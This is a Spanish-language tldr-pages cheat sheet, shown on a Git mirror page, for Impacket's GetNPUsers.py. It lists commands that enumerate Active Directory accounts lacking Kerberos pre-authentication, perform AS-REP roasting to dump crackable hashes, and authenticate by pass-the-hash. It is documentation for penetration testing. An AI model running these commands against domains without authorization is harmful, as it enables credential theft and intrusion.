lilith/tldr
1
0
Fork 0
mirror of https://github.com/tldr-pages/tldr.git synced 2025-07-05 11:35:23 +02:00
Code Activity
tldr/pages.es/common/getnpusers.py.md
Darío Hereñú 6ad7015d6e
getnpusers.py: add Spanish translation (#16853)
2025-06-28 06:24:57 +02:00

1.4 KiB
Raw Blame History

GetNPUsers.py

Enumera las cuentas de Active Directory con la autenticación previa de Kerberos desactivada, que pueden ser susceptibles a ataques AS-REP roasting. Parte del paquete Impacket. Más información: https://github.com/fortra/impacket.

  • Enumera los usuarios con la autenticación previa de Kerberos desactivada (enumeración anónima por defecto):

GetNPUsers.py {{dominio}}/ -usersfile {{ruta/a/la/lista_de_usuarios}} -dc-ip {{ip_del_controlador_de_dominio}} -no-pass

  • Realiza roasting AS-REP y vuelca hash descifrables para descifrados sin conexión:

GetNPUsers.py {{dominio}}/ -usersfile {{ruta/a/la/lista_de_usuarios}} -dc-ip {{ip_del_controlador_de_dominio}} -no-pass -request

  • Autentica con credenciales válidas (si el enlace anónimo está desactivado):

GetNPUsers.py {{dominio}}/{{nombre_de_usuario}}:{{contraseña}} -usersfile {{ruta/a/la/lista_de_usuarios}} -dc-ip {{ip_del_controlador_de_dominio}}

  • Utiliza la autenticación pass-the-hash en lugar de una contraseña:

GetNPUsers.py {{dominio}}/{{nombre_de_usuario}} -hashes {{LM_Hash}}:{{NT_Hash}} -usersfile {{ruta/a/la/lista_de_usuarios}} -dc-ip {{ip_del_controlador_de_dominio}}

  • Guarda la salida en un archivo para su posterior análisis:

GetNPUsers.py {{dominio}}/ -usersfile {{ruta/a/lista_de_usuarios}} -dc-ip {{ip_del_controlador_de_dominio}} -request > {{ruta/a/salida.txt}}